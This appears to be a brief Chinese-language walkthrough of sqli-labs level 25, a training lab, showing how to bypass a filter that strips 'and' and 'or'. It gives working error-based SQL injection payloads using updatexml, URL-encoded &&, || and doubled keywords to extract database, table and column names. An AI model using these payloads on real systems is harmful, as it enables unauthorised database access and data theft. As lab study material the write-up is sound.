less-25
观察提示or and 无法使用,输入and,发现被代替
and无法使用,可以使用&&符号,注意在url栏里需要url编码,不然无法使用
?id=1' %26%26 1=1 -- we
?id=1' || updatexml(1,concat("!",(select database()),"!"),1) -- we
第二步爆表名需要注意,information中有or,or被蔽掉
?id=1' || updatexml(1,concat("!",(select table_name from infoorrmation_schema.tables where table_schema='security'limit 0,1),"!"),1) -- we
and被蔽掉,改为anandd,,,,?id=1' || updatexml(1,concat("!",(select column_name from infoorrmation_schema.columns where table_schema='security' aandnd table_name='emails'limit 0,1),"!"),1) -- we
爆数据
